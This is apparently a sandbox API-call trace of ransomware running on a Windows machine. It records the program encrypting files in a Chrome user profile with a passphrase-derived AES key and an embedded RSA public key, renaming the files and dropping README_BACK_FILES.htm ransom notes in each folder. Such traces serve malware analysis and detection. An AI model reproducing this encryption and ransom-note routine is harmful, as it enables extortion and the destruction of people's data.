(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.gsg")) returned 1 [0265.634] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.fuck")) returned 1 [0265.636] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0265.636] CryptDestroyKey (hKey=0x2e7e9c0) returned 1 [0265.636] CryptReleaseContext (hProv=0x2e77398, dwFlags=0x0) returned 1 [0265.636] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.636] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0265.637] GetLastError () returned 0x0 [0265.637] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5")) returned 0x20 [0265.638] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5", dwFileAttributes=0x80) returned 1 [0265.639] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.642] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.643] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.gsg", dwFileAttributes=0x2) returned 1 [0265.643] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e77530) returned 1 [0265.646] CryptCreateHash (in: hProv=0x2e77530, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0265.646] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.646] CryptHashData (hHash=0x2e7e9c0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.646] CryptDeriveKey (in: hProv=0x2e77530, Algid=0x6610, hBaseData=0x2e7e9c0, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7eb80) returned 1 [0265.646] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----a", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.646] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0265.646] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e77398) returned 1 [0265.647] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77398, dwCertEncodingType=0x1, pInfo=0x2eb0a90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0ac0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0ac8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7ebc0) returned 1 [0265.647] CryptEncrypt (in: hKey=0x2e7ebc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0265.647] CryptEncrypt (in: hKey=0x2e7ebc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e774a8*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e774a8*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0265.647] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e774a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e774a8*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0265.648] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x10, lpOverlapped=0x0) returned 1 [0265.649] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x10, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x20) returned 1 [0265.649] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x20, lpOverlapped=0x0) returned 1 [0265.649] CloseHandle (hObject=0x5d40) returned 1 [0265.649] CloseHandle (hObject=0x5d50) returned 1 [0265.649] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), bFailIfExists=0) returned 1 [0265.653] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5", dwFileAttributes=0x0) returned 1 [0265.653] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.gsg")) returned 1 [0265.654] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.fuck")) returned 1 [0265.656] CryptDestroyHash (hHash=0x2e7e9c0) returned 1 [0265.656] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0265.657] CryptReleaseContext (hProv=0x2e77530, dwFlags=0x0) returned 1 [0265.657] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0265.657] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.657] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\readme_back_files.htm")) returned 0xffffffff [0265.657] AreFileApisANSI () returned 1 [0265.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 146 [0265.657] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.658] GetFileType (hFile=0x5d4c) returned 0x1 [0265.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0265.659] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0265.659] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0265.660] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\readme_back_files.htm")) returned 0xffffffff [0265.660] AreFileApisANSI () returned 1 [0265.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0265.660] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.661] GetFileType (hFile=0x5d48) returned 0x1 [0265.661] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0265.662] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.662] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.662] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.662] FindClose (in: hFindFile=0x29386f8 | out: hFindFile=0x29386f8) returned 1 [0265.662] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\readme_back_files.htm")) returned 0xffffffff [0265.662] AreFileApisANSI () returned 1 [0265.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0265.662] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.666] GetFileType (hFile=0x5d44) returned 0x1 [0265.666] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.667] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.667] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.667] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.667] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.667] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.668] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\readme_back_files.htm")) returned 0xffffffff [0265.668] AreFileApisANSI () returned 1 [0265.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0265.668] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.669] GetFileType (hFile=0x5d44) returned 0x1 [0265.669] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.670] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.670] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.672] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.672] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.672] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.672] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\readme_back_files.htm")) returned 0xffffffff [0265.672] AreFileApisANSI () returned 1 [0265.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0265.672] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.673] GetFileType (hFile=0x5d44) returned 0x1 [0265.673] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.674] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.674] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.675] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.675] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.675] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.675] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.675] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.675] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\origintrials\\readme_back_files.htm")) returned 0xffffffff [0265.675] AreFileApisANSI () returned 1 [0265.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28898f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0265.675] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\origintrials\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.676] GetFileType (hFile=0x5d44) returned 0x1 [0265.676] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.677] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.677] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fbc0 [0265.678] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.678] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.679] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.679] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pepperflash\\readme_back_files.htm")) returned 0xffffffff [0265.679] AreFileApisANSI () returned 1 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0265.679] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pepperflash\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.681] GetFileType (hFile=0x5d44) returned 0x1 [0265.681] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.682] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.682] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.682] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.682] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.682] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.682] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pnacl\\readme_back_files.htm")) returned 0xffffffff [0265.682] AreFileApisANSI () returned 1 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0265.683] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pnacl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.684] GetFileType (hFile=0x5d44) returned 0x1 [0265.684] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.685] 